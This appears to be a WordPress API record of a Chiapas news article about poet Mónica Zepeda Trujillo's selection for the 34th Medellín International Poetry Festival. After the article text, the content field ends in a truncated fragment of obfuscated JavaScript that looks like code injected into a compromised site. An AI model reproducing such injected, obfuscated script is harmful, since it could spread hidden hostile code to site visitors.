{"id":15441,"date":"2024-05-04T01:00:44","date_gmt":"2024-05-04T01:00:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15441"},"modified":"2024-05-04T01:00:45","modified_gmt":"2024-05-04T01:00:45","slug":"coleta-representara-a-mexico-en-el-34-festival-internacional-de-poesia-de-medellin","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15441","title":{"rendered":"Coleta representar\u00e1 a M\u00e9xico en el 34\u00b0 Festival Internacional de Poes\u00eda de Medell\u00edn"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031-1024x1024.jpg\" alt=\"\" class=\"wp-image-15442\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031-1024x1024.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031-768x768.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240503-WA0031.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>3 de mayo del 2024. San Crist\u00f3bal de Las Casas.- La joven escritora sancristobalense, M\u00f3nica Zepeda Trujillo, ha sido seleccionada para participar en el prestigioso 34\u00b0 Festival Internacional de Poes\u00eda de Medell\u00edn, tras haber sido elegida entre 500 trabajos procedentes de 21 pa\u00edses de todo el mundo.<\/p>\n\n\n\n<p>&#8220;Estoy muy contenta por haber sido seleccionada como una de las cuatro poetas internacionales para participar en el 34\u00b0 Festival Internacional de Poes\u00eda de Medell\u00edn, a trav\u00e9s de la convocatoria que abrieron a poetas menores de 40 a\u00f1os&#8221;, expres\u00f3 emocionada tras dar a conocer la noticia.<\/p>\n\n\n\n<p>Zepeda Trujillo explic\u00f3 que los organizadores recibieron m\u00e1s de 500 trabajos de poetas de todo el mundo para la selecci\u00f3n de los participantes. &#8220;He querido participar en este festival desde hace tiempo y el pr\u00f3ximo mes de julio tendr\u00e9 la oportunidad de volver a Colombia, un pa\u00eds que me maravilla&#8221;, a\u00f1adi\u00f3.<\/p>\n\n\n\n<p>La escritora se mostr\u00f3 &#8220;muy afortunada por la posibilidad de conocer o reencontrar a poetas de gran trayectoria que s\u00e9 que asistir\u00e1n, y por continuar compartiendo mi trabajo po\u00e9tico en una sede tan importante dentro del \u00e1mbito literario mundial&#8221;.<\/p>\n\n\n\n<p>El equipo de pre jurados hab\u00eda seleccionado previamente a 57 finalistas distribuidos en tres categor\u00edas: internacionales, nacionales y locales. Tras la deliberaci\u00f3n de los jurados, resultaron elegidos 14 poetas, entre ellos Zepeda Trujillo, quien representar\u00e1 a M\u00e9xico en el evento.<\/p>\n\n\n\n<p>Entre los finalistas, se destaca la diversidad de voces y temas que dialogan profundamente con el esp\u00edritu de la poes\u00eda. Se abordan temas como la defensa de la vida, lo sagrado, el canto a la naturaleza y a los paisajes latinoamericanos, la experiencia cotidiana en la ciudad, la cibern\u00e9tica, los conflictos armados, la feminidad, los sentimientos de las mujeres en las comunidades ind\u00edgenas, la superaci\u00f3n del dolor y la configuraci\u00f3n de la personalidad a trav\u00e9s de la expresi\u00f3n po\u00e9tica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 3 de mayo del 2024. San Crist\u00f3bal de Las Casas.- La joven escritora sancristobalense, M\u00f3nica Zepeda Trujillo, ha sido seleccionada para participar en el prestigioso 34\u00b0 Festival Internacional de Poes\u00eda de Medell\u00edn, tras haber sido elegida entre 500 trabajos procedentes de 21 pa\u00edses de todo el mundo. &#8220;Estoy muy contenta por haber &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15442,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15441","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15441"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15441\/revisions"}],"predecessor-version":[{"id":15443,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15441\/revisions\/15443"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15442"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}